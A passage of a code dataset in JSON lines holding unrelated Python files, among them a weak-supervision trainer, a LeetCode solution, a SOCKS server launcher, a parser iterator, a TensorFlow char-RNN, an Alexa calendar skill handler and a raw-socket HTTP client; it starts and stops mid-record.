instances_index\r\n\r\n\tdef train_ge_criteria(new_weights):\r\n\t\t\"\"\"\r\n\t\tThis internal function returns the objective value of ge criteria\r\n\r\n\t\t:param new_weights: weights to use for computing multinomial logistic regression\r\n\t\t:type new_weights: ndarray\r\n\t\t:return: tuple containing (objective, gradient)\r\n\t\t:rtype: (float, array)\r\n\t\t\"\"\"\r\n\r\n\t\tobj = 0\r\n\t\tscore = data.dot(new_weights)\r\n\t\tprobs, grad = logistic(score)\r\n\t\tgradient = 0\r\n\t\t# Code to compute the objective function\r\n\t\tfor i in range(num_weak_signals):\r\n\t\t\tweak_signal = weak_signal_probabilities[i]\r\n\t\t\treference_probs = compute_reference_distribution(labels, weak_signal)\r\n\t\t\tempirical_probs, index = compute_empirical_distribution(probs, weak_signal)\r\n\r\n\t\t\t# empirical computations\r\n\t\t\tpos_empirical_probs, neg_empirical_probs = empirical_probs\r\n\t\t\tpos_index, neg_index = index\r\n\r\n\t\t\t# reference computations\r\n\t\t\tpos_reference_probs, neg_reference_probs = reference_probs\r\n\r\n\t\t\ttry:\r\n\t\t\t\twith np.errstate(all='ignore'):\r\n\t\t\t\t\t# compute objective for positive probabilities\r\n\t\t\t\t\tobj += pos_reference_probs * np.log(pos_reference_probs / pos_empirical_probs)\r\n\t\t\t\t\tgradient += (pos_reference_probs / pos_empirical_probs) * data[pos_index].T.dot(grad[pos_index]) / grad[pos_index].size\r\n\r\n\t\t\t\t\t# compute objective for negative probabilities\r\n\t\t\t\t\tobj += neg_reference_probs * np.log(neg_reference_probs / neg_empirical_probs)\r\n\t\t\t\t\tgradient += (neg_reference_probs / neg_empirical_probs) * data[neg_index].T.dot(grad[neg_index]) / grad[neg_index].size\r\n\t\t\texcept:\r\n\t\t\t\t# compute objective for positive probabilities\r\n\t\t\t\tobj += np.nan_to_num(pos_reference_probs * np.log(pos_reference_probs / pos_empirical_probs))\r\n\t\t\t\tgradient += np.nan_to_num((pos_reference_probs / pos_empirical_probs) * data[pos_index].T.dot(grad[pos_index]) / grad[pos_index].size)\r\n\r\n\t\t\t\t# compute objective for negative probabilities\r\n\t\t\t\tobj += np.nan_to_num(neg_reference_probs * np.log(neg_reference_probs / neg_empirical_probs))\r\n\t\t\t\tgradient += np.nan_to_num((neg_reference_probs / neg_empirical_probs) * data[neg_index].T.dot(grad[neg_index]) / grad[neg_index].size)\r\n\r\n\t\tobjective = obj + (0.5 * np.sum(new_weights**2))\r\n\t\tgradient = new_weights - gradient\r\n\r\n\t\treturn objective, gradient\r\n\r\n\tif check_gradient:\r\n\t grad_error = check_grad(lambda w: train_ge_criteria(w)[0], lambda w: train_ge_criteria(w)[1].ravel(), weights)\r\n\t print(\"Provided gradient differed from numerical approximation by %e (should be below 1e-3)\" % grad_error)\r\n\r\n\t# pass the internal objective function into the optimizer\r\n\tres = minimize(lambda w: train_ge_criteria(w)[0], jac=lambda w: train_ge_criteria(w)[1].ravel(), x0=weights)\r\n\tweights = res.x\r\n\r\n\treturn weights\r\n\r\n\"\"\"\r\ndata = np.random.randn(100, 50)\r\nlabels = np.random.randint(2, size=100)\r\nweak_signal_probabilities = np.random.rand(3, 100)\r\nnum_weak_signals = 1\r\nmodel = ge_criterion_train(data, labels, weak_signal_probabilities, num_weak_signals, check_gradient=True)\r\n\"\"\"\r\n","sub_path":"Adversarial Label Learning/ge_criterion_baseline.py","file_name":"ge_criterion_baseline.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"530634845","text":"import pandas as pd\n\n\n@pd.api.extensions.register_dataframe_accessor(\"as_tours\")\nclass ToursAccessor(object):\n \"\"\"A pandas accessor to treat DataFrames as collections of tours. \n\n Requires at least the following columns: \n ``['user_id', 'started_at', 'finished_at', 'origin_staypoint_id', 'journey']``\n\n The ``index`` of the GeoDataFrame will be treated as unique identifier of the `trips`\n\n For several usecases, the following additional columns are required:\n ``['context']``\n\n Notes\n --------\n Tours are an aggregation level in transport planning that summarize all trips until a person returns to the\n same location. Tours starting and ending at home (=journey) are especially important.\n\n ``started_at`` and ``finished_at`` are timezone aware pandas datetime objects.\n\n Examples\n --------\n >>> df.as_tours.plot()\n \"\"\"\n\n required_columns = ['user_id', 'started_at', 'finished_at', 'origin_destination_location_id', 'journey']\n\n def __init__(self, pandas_obj):\n self._validate(pandas_obj)\n self._obj = pandas_obj\n\n @staticmethod\n def _validate(obj):\n if any([c not in obj.columns for c in ToursAccessor.required_columns]):\n raise AttributeError(\"To process a DataFrame as a collection of tours, \"\n + \"it must have the properties [%s], but it has [%s].\"\n % (', '.join(ToursAccessor.required_columns), ', '.join(obj.columns)))\n\n # check timestamp dtypes\n assert pd.api.types.is_datetime64tz_dtype(obj['started_at']), \\\n \"dtype of started_at is {} but has to be datetime64 and timezone aware\".format(obj['started_at'].dtype)\n assert pd.api.types.is_datetime64tz_dtype(obj['finished_at']), \\\n \"dtype of finished_at is {} but has to be datetime64 and timezone aware\".format(obj['finished_at'].dtype)\n\n def to_csv(self, filename, *args, **kwargs):\n \"\"\"Stores this collection of tours as a CSV file.\n See :func:`trackintel.io.file.write_tours_csv`.\"\"\"\n raise NotImplementedError\n\n def plot(self, *args, **kwargs):\n \"\"\"Plots this collection of tours. \n See :func:`trackintel.visualization.tours.plot_tours`.\"\"\"\n raise NotImplementedError\n","sub_path":"trackintel/model/tours.py","file_name":"tours.py","file_ext":"py","file_size_in_byte":2277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"589196341","text":"\"\"\"\n969. Pancake Sorting\nhttps://leetcode.com/problems/pancake-sorting/\n\n_author: Kashif Memon\n_python_version: 3.7.2\n\"\"\"\n\n\nclass Solution:\n out = []\n\n def pancakeSort(self, A: 'List[int]') -> 'List[int]':\n if len(A) == 1: return []\n maxValPos = A.index(max(A))\n A = A[:maxValPos + 1][::-1] + A[maxValPos + 1:]\n A = A[::-1]\n return [maxValPos + 1, len(A)] + self.pancakeSort(A[:-1])\n\n # My Solution - Wrong apparently\n def flip(idx=None):\n if idx:\n tmp = A[:idx][::-1]\n return tmp + A[idx:]\n return A[::-1]\n\n if not A: return []\n maxValPos = A.index(max(A)) + 1\n self.out.append(maxValPos)\n A = flip(idx=maxValPos)\n # print(\"i\", A)\n A = flip()\n # print(\"0\", A)\n self.pancakeSort(A[:-1]) + [A[-1]]\n return self.out\n\n\ndef main():\n print(Solution().pancakeSort([1, 2, 3]))\n # print(Solution().pancakeSort([19, 23, 6, 15, 45, 30, 14]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solutions-to-leetcode/969_pancake_sorting.py","file_name":"969_pancake_sorting.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"101327820","text":"#!/usr/bin/env python\n# coding=utf-8\nimport argparse, logging\nfrom . import serve, logger, Config\nfrom .proxy import SkipPicker\n\nlogger.setLevel(logging.INFO)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nfmt = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')\nch.setFormatter(fmt)\nlogger.addHandler(ch)\n\nparser = argparse.ArgumentParser(description = 'HTTP server by Gerald.')\nparser.add_argument('-H', '--host', nargs='*', help='the host of SOCKS server')\nparser.add_argument('-p', '--port', default=1080, help='the port of SOCKS server')\nparser.add_argument('-a', '--auth', nargs=2, action='append', help='username and password pairs')\nparser.add_argument('--versions', nargs='+', help='allowed versions, e.g 4 5')\n\nconfig = Config()\nargs = parser.parse_args()\nif args.host is not None:\n config.host = args.host\nconfig.port = args.port\nif args.auth is not None:\n for user, pwd in args.auth:\n config.set_user(user, pwd)\nif args.versions is not None:\n config.versions = set(args.versions)\nconfig.set_proxies([\n None,\n # ('127.0.0.1', 1080, 5, None, None, True),\n])\nconfig.add_picker(SkipPicker((\n '127.0.0.1',\n 'localhost',\n)))\n\nserve(config)\n","sub_path":"socks/server/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"497167571","text":"# ----------------------------------------------------------------------\r\n# |\r\n# | NormalizedIterator.py\r\n# |\r\n# | David Brownell \r\n# | 2021-04-11 12:32:03\r\n# |\r\n# ----------------------------------------------------------------------\r\n# |\r\n# | Copyright David Brownell 2021\r\n# | Distributed under the Boost Software License, Version 1.0. See\r\n# | accompanying file LICENSE_1_0.txt or copy at\r\n# | http://www.boost.org/LICENSE_1_0.txt.\r\n# |\r\n# ----------------------------------------------------------------------\r\n\"\"\"Contains the NormalizedIterator object\"\"\"\r\n\r\nimport os\r\n\r\nimport CommonEnvironment\r\n\r\nfrom CommonEnvironmentEx.Package import InitRelativeImports\r\n\r\n# ----------------------------------------------------------------------\r\n_script_fullpath = CommonEnvironment.ThisFullpath()\r\n_script_dir, _script_name = os.path.split(_script_fullpath)\r\n# ----------------------------------------------------------------------\r\n\r\nwith InitRelativeImports():\r\n from .Normalize import LineInfo, NormalizedContent\r\n\r\n# ----------------------------------------------------------------------\r\nclass NormalizedIterator(object):\r\n \"\"\"Object used to iterate through content generated via a call to `Normalize`\"\"\"\r\n\r\n # ----------------------------------------------------------------------\r\n def __init__(\r\n self,\r\n normalized_content: NormalizedContent,\r\n ):\r\n self.Content = normalized_content.Content\r\n self.ContentLen = normalized_content.ContentLen\r\n self.LineInfos = normalized_content.LineInfos\r\n\r\n self._line_info_index = 0\r\n self._offset = 0\r\n\r\n self._last_consumed_dedent_line = None\r\n\r\n # ----------------------------------------------------------------------\r\n def __eq__(self, other):\r\n return self.__dict__ == other.__dict__\r\n\r\n # ----------------------------------------------------------------------\r\n @property\r\n def Line(self) -> int:\r\n \"\"\"Returns the current (1-based) line number\"\"\"\r\n return self._line_info_index + (0 if self.HasTrailingDedents() and self.AtEnd() else 1)\r\n\r\n @property\r\n def Column(self) -> int:\r\n \"\"\"Returns the current (1-based) column number\"\"\"\r\n if self.AtEnd():\r\n return 1\r\n\r\n return self._offset - self.LineInfo.OffsetStart + 1\r\n\r\n @property\r\n def LineInfo(self) -> LineInfo:\r\n \"\"\"Returns the current LineInfo object\"\"\"\r\n assert not self.AtEnd()\r\n return self.LineInfos[self._line_info_index]\r\n\r\n @property\r\n def Offset(self) -> int:\r\n \"\"\"Returns the current offset\"\"\"\r\n return self._offset\r\n\r\n # ----------------------------------------------------------------------\r\n def AtEnd(self) -> bool:\r\n return self._line_info_index == len(self.LineInfos)\r\n\r\n # ----------------------------------------------------------------------\r\n def HasTrailingDedents(self) -> bool:\r\n return bool(\r\n self.LineInfos\r\n and self.LineInfos[-1].HasNewDedents()\r\n and self.LineInfos[-1].OffsetStart == self.LineInfos[-1].OffsetEnd\r\n and self.LineInfos[-1].OffsetStart == self.LineInfos[-1].StartPos\r\n and self.LineInfos[-1].OffsetEnd == self.LineInfos[-1].EndPos\r\n )\r\n\r\n # ----------------------------------------------------------------------\r\n def AtTrailingDedents(self) -> bool:\r\n return self.HasTrailingDedents() and self._line_info_index == len(self.LineInfos) - 1\r\n\r\n # ----------------------------------------------------------------------\r\n def HasConsumedDedents(self):\r\n \"\"\"\\\r\n Returns True if the dedents on the current line have been consumed.\r\n\r\n Dedents on lines without a prefix are troublesome, as there isn't any\r\n way to indicate that they have already been consumed. Because of this,\r\n we can find ourselves in an infinite loop when attempting to consume\r\n a dedent like this over and over.\r\n\r\n Maintain the line of the last dedent consumed so that we can determine\r\n if the dedent should be ignored.\r\n \"\"\"\r\n\r\n return not self.LineInfo.HasNewDedents() or self._last_consumed_dedent_line == self._line_info_index\r\n\r\n # ----------------------------------------------------------------------\r\n def ConsumeDedents(self):\r\n assert self.LineInfo.HasNewDedents()\r\n assert self._last_consumed_dedent_line != self._line_info_index\r\n\r\n self._last_consumed_dedent_line = self._line_info_index\r\n\r\n # ----------------------------------------------------------------------\r\n def IsBlankLine(self) -> bool:\r\n \"\"\"Returns True if the offset is positioned at the beginning of a blank line\"\"\"\r\n\r\n # We don't have any line when we are at the end, so we can't have\r\n # a blank line.\r\n if self.AtEnd():\r\n return False\r\n\r\n # The trailing dedents line should not be considered a blank line\r\n if (\r\n self._line_info_index == len(self.LineInfos) - 1\r\n and self.HasTrailingDedents()\r\n ):\r\n return False\r\n\r\n info = self.LineInfo\r\n return info.EndPos == info.StartPos\r\n\r\n # ----------------------------------------------------------------------\r\n def SkipLine(self):\r\n info = self.LineInfo\r\n\r\n self._offset = info.OffsetEnd\r\n\r\n return self.Advance(1)\r\n\r\n # ----------------------------------------------------------------------\r\n def SkipPrefix(self):\r\n offset = self.Offset\r\n info = self.LineInfo\r\n\r\n assert offset == info.OffsetStart\r\n\r\n delta = info.StartPos - info.OffsetStart\r\n if delta == 0:\r\n return self\r\n\r\n return self.Advance(delta)\r\n\r\n # ----------------------------------------------------------------------\r\n def SkipSuffix(self):\r\n offset = self.Offset\r\n info = self.LineInfo\r\n\r\n assert offset == info.EndPos\r\n\r\n delta = info.OffsetEnd - info.EndPos\r\n if delta == 0:\r\n return self\r\n\r\n return self.Advance(delta)\r\n\r\n # ----------------------------------------------------------------------\r\n def Advance(\r\n self,\r\n delta: int,\r\n ):\r\n info = self.LineInfo\r\n offset = self.Offset\r\n\r\n if offset == info.OffsetEnd:\r\n if (\r\n self._line_info_index + 1 == len(self.LineInfos)\r\n and self.HasTrailingDedents()\r\n ):\r\n assert delta == 0, delta\r\n else:\r\n assert delta == 1, delta\r\n\r\n if not self.AtEnd():\r\n self._line_info_index += 1\r\n\r\n else:\r\n assert offset >= info.OffsetStart and offset <= info.OffsetEnd, (offset, info)\r\n assert offset + delta <= info.OffsetEnd, (delta, offset, info)\r\n assert (\r\n offset >= info.StartPos\r\n or (offset == info.OffsetStart and offset + delta == info.StartPos)\r\n ), (offset, info)\r\n\r\n self._offset += delta\r\n\r\n return self\r\n\r\n # ----------------------------------------------------------------------\r\n def Clone(self):\r\n # Dynamically created the NormalizedContent object\r\n result = self.__class__(\r\n NormalizedContent(\r\n self.Content,\r\n self.ContentLen,\r\n self.LineInfos,\r\n ),\r\n )\r\n\r\n result._offset = self._offset # pylint: disable=W0212\r\n result._line_info_index = self._line_info_index # pylint: disable=W0212\r\n result._last_consumed_dedent_line = self._last_consumed_dedent_line # pylint: disable=W0212\r\n\r\n return result\r\n","sub_path":"src/TheLanguage/ParserImpl/NormalizedIterator.py","file_name":"NormalizedIterator.py","file_ext":"py","file_size_in_byte":8050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"593511977","text":"from immagini import *\r\nimport sys\r\nsys.setrecursionlimit(1000)\r\n\r\ndef formatta(elem, destra, sotto):\r\n if destra >= elem and sotto >= elem:\r\n return elem + 1\r\n return formatta(elem-1, destra, sotto)\r\n\r\ndef init(img, c):\r\n for i,y in enumerate(img):\r\n for k,x in enumerate(y):\r\n if x != c:\r\n img[i][k] = 0\r\n else:\r\n img[i][k] = 1\r\n return img\r\n\r\ndef res(img):\r\n l = 0\r\n ind = 0\r\n for i,x in enumerate(img):\r\n if max(x) > l:\r\n l = max(x)\r\n ind = i\r\n return l, (img[ind].index(l)-l+1, ind-l+1)\r\n\r\ndef quadrato(filename, c):\r\n png = load(filename)\r\n img = init(png, c)\r\n l = (0, (0, 0))\r\n for i,y in enumerate(img[:-1]):\r\n for k,x in enumerate(y[:-1]):\r\n if x != 0:\r\n destra = img[i][k+1]\r\n sotto = img[i+1][k]\r\n diagonale = img[i+1][k+1]\r\n if diagonale != 0 and destra != 0 and sotto != 0:\r\n img[i+1][k+1] = formatta(x, destra, sotto)\r\n return res(img)\r\n","sub_path":"students/1795119/homework03/program01.py","file_name":"program01.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"624177099","text":"import tensorflow as tf\nimport numpy as np\n\ndef download_data(url, filename, work_directory):\n from six.moves.urllib.request import urlretrieve\n import os\n if not os.path.exists(work_directory):\n os.mkdir(work_directory)\n filepath = os.path.join(work_directory, filename)\n if not os.path.exists(filepath):\n filepath, _ = urlretrieve(url, filepath)\n statinfo = os.stat(filepath)\n print('Succesfully downloaded', filename, statinfo.st_size, 'bytes.')\n return filepath\n\ndownload_data(\"https://raw.githubusercontent.com/sherjilozair/char-rnn-tensorflow/master/data/tinyshakespeare/input.txt\", \"tinyshakespeare.txt\", \"tinyshakespeare_data\")\n\nwith open(\"tinyshakespeare_data/tinyshakespeare.txt\") as f:\n data = f.read()\n data = \"\".join(data.split())\n\n def split(s, chunk_size):\n a = zip(*[s[i::chunk_size] for i in range(chunk_size)])\n return [''.join(t) for t in a]\n\n strings = split(data, 20)\n strings = strings[:1000]\n char_rdic = list(set(data))\n\n#char_rdic = [chr(ch) for ch in range(ord('a'), ord('z')+1)] # id -> char\nchar_dic = {w: i for i, w in enumerate(char_rdic)} # char -> id\n\n# to index\n#strings = [\"helloworld\", \"machinegun\", \"tensorflow\"]\n\nsamples = [[char_dic[ch] for ch in string] for string in strings]\n\n\"\"\"\nx_data = np.array([ [1,0,0,0,0,0,0], # h\n [0,1,0,0,0,0,0], # e\n [0,0,1,0,0,0,0], # l\n [0,0,1,0,0,0,0], # l\n [0,0,0,1,0,0,0], # o\n [0,0,0,0,1,0,0], # w\n [0,0,0,1,0,0,0], # o\n [0,0,0,0,0,1,0], # r\n [0,0,1,0,0,0,0]], # l\n dtype='f')\n\"\"\"\nx_data = [tf.one_hot(sample[:-1], len(char_dic), 1.0, 0.0, -1) for sample in samples]\n\nprint(\"YES!\")\n\n# Configuration\nrnn_size = len(char_dic)\ntime_step_size = len(samples[0])-1 # 'helloworl' -> predict 'elloworld'\nbatch_size = len(strings)\n\n# RNN model\nrnn_cell = tf.nn.rnn_cell.BasicRNNCell(rnn_size)\nstate = tf.zeros([batch_size, rnn_cell.state_size])\nprint(x_data)\nX_split = tf.split(1, time_step_size, x_data)\nprint(X_split)\nX_split = [tf.reshape(x, shape=[batch_size, len(char_dic)]) for x in X_split]\nprint(X_split)\n\nprint(\"..................\")\n\noutputs, state = tf.nn.rnn(rnn_cell, X_split, state)\nprint (state)\nprint (outputs)\n\nprint(\"----------------\")\n\n# logits: list of 2D Tensors of shape [batch_size x num_decoder_symbols].\n# targets: list of 1D batch-sized int32 Tensors of the same length as logits.\n# weights: list of 1D batch-sized float-Tensors of the same length as logits.\nlogits = outputs\ntargets = np.transpose([sample[1:] for sample in samples])\ntargets = [tf.reshape(target, [-1]) for target in targets]\nweights = [tf.ones(shape=[batch_size]) for _ in range(time_step_size)]\n\nprint(logits)\nprint(targets)\nprint(weights)\n\nloss = tf.nn.seq2seq.sequence_loss_by_example(logits, targets, weights)\ncost = tf.reduce_mean(tf.reduce_sum(loss))\ntrain_op = tf.train.RMSPropOptimizer(0.01, 0.9).minimize(cost)\n\nprint(\"======== T R A I N ========\")\n\n# Launch the graph in a session\nwith tf.Session() as sess:\n # you need to initialize all variables\n tf.initialize_all_variables().run()\n for epoch in range(2000):\n sess.run(train_op)\n results = sess.run(tf.arg_max(logits, 2))\n results = np.transpose(results)\n print(\"Epoch\", epoch, \"----\")\n results = results[:20]\n for result in results:\n print (\"\\t\", ''.join([char_rdic[t] for t in result]))","sub_path":"tinyshakespeare/simple-rnn.py","file_name":"simple-rnn.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191745362","text":"from datetime import datetime, timedelta\nfrom urllib import request\nimport json\n# changed the next import so that lambda_function needn't know the internal\n# organization of the libeary package\nfrom libeary import ABEEvent, AVSIntent\n\n\ndef lambda_handler(req, context):\n \"\"\"\n Entry function (called by AWS)\n :param req: a dictionary with the JSON values sent from AVS\n :param context: don't know what this is\n :return: a dictionary (to be formatted as a JSON string)\n \"\"\"\n\n # Convert the server request to an AVSIntent object\n intent = AVSIntent(req)\n\n # Check if the user just opened the Skill (without specifying any actions)\n if intent.is_launch_request:\n return prepare_response('Welcome to the ABE, the Olin calendar. How may I help you?')\n\n # Check if the user wants to know what's happening next\n elif intent.name == 'WhatsHappeningNext':\n return handle_whats_happening_next_request(intent)\n\n # Check if the user wants to know what featured events are happening next\n elif intent.name == 'WhatsHappeningNextFeatured':\n return handle_whats_happening_next_request(intent, 'featured')\n\n elif intent.name == 'WhatsHappeningOn': # Look up what's happening on/at a specific day/time\n return handle_whats_happening_on_request(intent)\n\n # There was a problem interpreting the intent\n # This is a developer-centered message. Consider wording aimed at the user\n # of the system.\n # Stretch: log errors for analysis as to popular unrecognized intents to\n # implement next. (Maybe AWS already has a mechanism for this?)\n return prepare_response(\"I didn't recognize the intent \" + intent.name)\n\n\ndef handle_whats_happening_next_request(intent, labels=None):\n \"\"\"\n This function queries ABE for events happening in the next week. It handles the \"WhatsHappeningNext\" request from AVS.\n :param {AVSIntent} intent: the intent from AVS\n :param {list} labels: a list of labels to filter events by\n :return {list}: the events found in the next week\n \"\"\"\n # Resolve the dates to look between\n today = datetime.now()\n # timedelta is a good candidate for (1) a global, or (2) a configurable\n # global, e.g. via an environment variable. The admin documentation can\n # document configuration options, and whether they're found in the code or\n # in the enviornment.\n week_from_today = today + timedelta(weeks=1)\n\n # Get the events\n events = get_events(start=today, end=week_from_today, labels=labels)\n # If there is an error, consider reporting this fact to the user so they\n # don't erroneously think nothing is scheduled. (This is less critical\n # with current uses of ABE. It could be more critical if you were\n # relying on the skill to tell you, say, your next class or due date.)\n if events is None: # Make sure there wasn't an error talking to ABE\n return prepare_abe_connectivity_problem_response()\n\n # Build the response\n text_res = 'I found {} events coming up on the Olin calendar in the next week.'.format(len(events))\n # In Python 3.6, you can also say f'I found #{len(events)} events…'\n for event in events:\n text_res += \" {}, there's {} {}.\".format(event.get_start_speech(),\n event.title, 'in ' + event.location if event.location else '')\n\n return prepare_response(text_res)\n\n\ndef handle_whats_happening_on_request(intent):\n \"\"\"\n This function queries ABE for events happening on a specific date. It handles the \"WhatsHappeningOn\" intent from AVS.\n :param {AVSIntent} intent: the intent from AVS\n :return {list}: the events found on the given date\n \"\"\"\n # Convert intent date to Python date\n date = intent.slots['date'].value\n # '%Y-%m-%d' looks like it's defined by the skill. Does the skill\n # documentation give this format a name that you can use as a global\n # variable, for documentation as to where the string is coming from /\n # what it means? You could define this in libeary, to move more AWS\n # specifics there.\n date = datetime.strptime(date, '%Y-%m-%d')\n tomorrow_morning = date + timedelta(days=1) # The end time for our query\n\n # Get the events\n events = get_events(start=date, end=tomorrow_morning)\n # Same as previous comment. Which suggests factoring the common code from\n # handle_whats_happening_next_request and handle_whats_happening_on_request.\n # Also (now that I see this a second time), it would make sense for\n # get_events to raise an error instead of return None, as a more\n # conventional means to signal an exception, that also forces the caller\n # to think through how to handle this case.\n if events is None: # Make sure there wasn't an error talking to ABE\n return prepare_abe_connectivity_problem_response()\n\n # Build the response\n date_as_words = date.strftime('%A, %B %d')\n count = len(events)\n text_res = 'I found {} event{} on {}.'.format(\n 'no' if count == 0 else count, '' if count == 1 else 's', date_as_words)\n for event in events:\n text_res += \" {}, there's {} {}.\".format(event.get_start_speech(),\n event.title, 'in ' + event.location if event.location else '')\n\n return prepare_response(text_res)\n\n\ndef prepare_abe_connectivity_problem_response():\n \"\"\"\n Generates a response to send to AVS indicating there was a problem talking to ABE.\n :return {dict}: a response to be sent back to AVS\n \"\"\"\n # This is a good example of a user-oriented solution message. In an actual\n # deployment, this needs to go in a context of how to find said overlord.\n return prepare_response('There was a problem speaking to ABE. Please contact your Library Overlord.')\n\n\ndef get_events(start=None, end=None, labels=None):\n \"\"\"\n Makes any necessary HTTP requests and does any filtering necessary to get events from ABE.\n :param {datetime} start: (optional) the first day to fetch events for\n :param {datetime} end: (optional) the last day to fetch events for\n :param {list} labels: (optional) a list of tags to filter results based on\n :return {list}: the events found\n \"\"\"\n # [Not part of this goal] TODO replace by a logging command\n print('Getting events between {} and {}'.format(start, end))\n # Make an HTTP request to ABE\n request_url = 'https://abe-dev.herokuapp.com/events/' # TODO Load this from an environment variable\n # It looks like this will do the wrong thing if one of start and end is defined and the other\n # is none, so add an assert for that, e.g.\n # assert (start and end) or (not start and not end)\n # or the more cryptic:\n # assert bool(start) == bool(end)\n if start and end: # If we're searching within a specific range, add that to the GET parameters\n request_url += '?start={}&end={}'.format(format_date_url(start), format_date_url(end))\n\n # Put as little as possible inside a `try` block. In this case, just the\n # call to `json.loads`.\n try:\n with request.urlopen(request.Request(request_url)) as res:\n # Parse the server response TODO Error checking\n res = res.read().decode()\n if res.startswith('[]'): # TODO Why is this necessary????\n print('Found 0 events')\n return [] # No events found\n print('Found some events:', res)\n result = json.loads(res)\n # Similarly, catch as narrow an exception as possible. As originally,\n # written, this will catch network connection errors, server errors, and\n # program errors in the block above, and disguise them all as parse errors.\n except json.JSONDecodeError as e:\n # Consider logging and then re-raising the error, so that the caller\n # receives this as an error instead of checking for None.\n print('Error parsing response from ABE')\n print(e)\n return None # Some error talking to ABE\n\n # Convert the result into the format we want\n events = []\n for item in result:\n # Convert JSON into an event object\n # Use a different variable for a different value type.\n event = ABEEvent(item)\n # Filter, if necessary TODO ABE does this\n if labels:\n if event.has_labels(labels):\n events.append(event)\n else: # Filtering not necessary\n events.append(event)\n # Can also do something like:\n # events = [ABEEvent(event) for event in result]\n # if labels:\n # events = [event for event in events if event.has_labels(labels)]\n # This is a matter of taste.\n\n return events\n\n\ndef format_date_url(date, fmt='%Y-%m-%d'):\n \"\"\"\n Formats a date as a string for making ABE requests.\n :param {datetime} date: the date to format\n :param {str} fmt: the format to use (defaults to YYYY-MM-dd)\n :return: the date in the specified string format\n \"\"\"\n return date.strftime(fmt)\n\n\ndef prepare_response(text):\n \"\"\"\n Generates a response object to be sent to AVS.\n :param text: the text for Alexa to speak\n :return {dict}: the result to send back to AVS\n \"\"\"\n return {\n 'version': '1.0',\n 'response': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': text,\n }\n }\n }\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":9384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"408771647","text":"# coding = utf-8\nimport re\nimport signal\nimport socket\nimport sys\n\n\n# 这里处理ctrl+c的信号(方便ctrl+c退出)\ndef handle_int(signum, handler):\n print('程序中断退出,信号:%d' % signum, '处理器是:{}'.format(handler))\n client_socket.close()\n sys.exit(0)\n\n\n# 绑定对ctrl+c信号的处理\nsignal.signal(signalnum=signal.SIGINT, handler=handle_int)\n\n\nserver_name = 'www.huanqiu.com'\n# 获取IP地址(这个过程不是必须的)\nlist_info = socket.getaddrinfo(\n host=server_name,\n port=80,\n family=socket.AF_INET,\n type=socket.SOCK_STREAM,\n proto=socket.IPPROTO_TCP,\n flags=socket.AI_ALL) # socket.AI_***参数的一部分\nfor _, _, _, _, address in list_info:\n print('IP:%s,PORT:%d' % address)\n\n# 创建socket\nclient_socket = socket.socket(\n socket.AF_INET, # 网络地址族:常用的是internet网地址格式(IP地址)\n socket.SOCK_STREAM, # 网络通信方式:流与报文两种\n socket.IPPROTO_TCP) # 通信协议:数据包的格式\n\n# 连接到到服务器(取上面取出的第一个INET地址)\nprint(list_info[0][-1])\nclient_socket.connect(list_info[0][-1]) # 没有返回值,需要进行异常处理,这里容易被信号中断\n\n# 发送数据\nrequest_string = ''\nrequest_string += 'GET / HTTP/1.1\\r\\n'\nrequest_string += 'Host: %s:9999\\r\\n' % server_name # 可以替换成IP地址\nrequest_string += 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n'\nrequest_string += 'Upgrade-Insecure-Requests: 1\\r\\n'\nrequest_string += 'Cookie: _xsrf=2|f877d065|146c6a9838e67ba203776913fae34f45|1547796259\\r\\n'\nrequest_string += 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15\\r\\n'\nrequest_string += 'Accept-Language: zh-cn\\r\\n'\n# request_string += 'Accept-Encoding: gzip, deflate\\r\\n'\nrequest_string += 'Connection: keep-alive\\r\\n'\nrequest_string += '\\r\\n'\nrequest_string += '\\r\\n'\n\nbytes_num = client_socket.send(request_string.encode('UTF-8'))\nprint('发送成功的字节数:%d' % bytes_num)\n\n# 接收服务器响应的协议数据\nheader_buffers = b''\nwhile True:\n # 一个子节一个子节读取\n buffer = client_socket.recv(1, 0) # MSG_**等\n header_buffers += buffer\n # 判定最后四个子节是否是'\\r\\n\\r\\n':表示响应头读完\n last_four_bytes = header_buffers[-4:] # 取最后四个子节\n if last_four_bytes == b'\\r\\n\\r\\n':\n break # header结束\n\n# 把子节转换为字符串\nheader_string = header_buffers.decode('utf-8')\nprint('响应协议头:\\n', header_string)\n# 获取请求体的长度\nregex = r'Content-Length: (\\d*?)\\r\\n'\nlen_content = re.findall(regex, header_string, re.MULTILINE)\nlen_content = int(len_content[0])\nprint('响应正文长度为:{}'.format(len_content))\n\n# 下面读取响应正文\nbody_buffers = b''\nwhile True:\n buffer = client_socket.recv(1024 * 10, 0) # MSG_**等\n body_buffers += buffer\n if len(body_buffers) == len_content:\n break\n\nprint('响应体读取完毕!')\nbody_string = body_buffers.decode('utf-8')\n# print(body_string)\n","sub_path":"day04/codes/c02_browserclient.py","file_name":"c02_browserclient.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"214698625","text":"import numpy as np\nimport matplotlib.pyplot 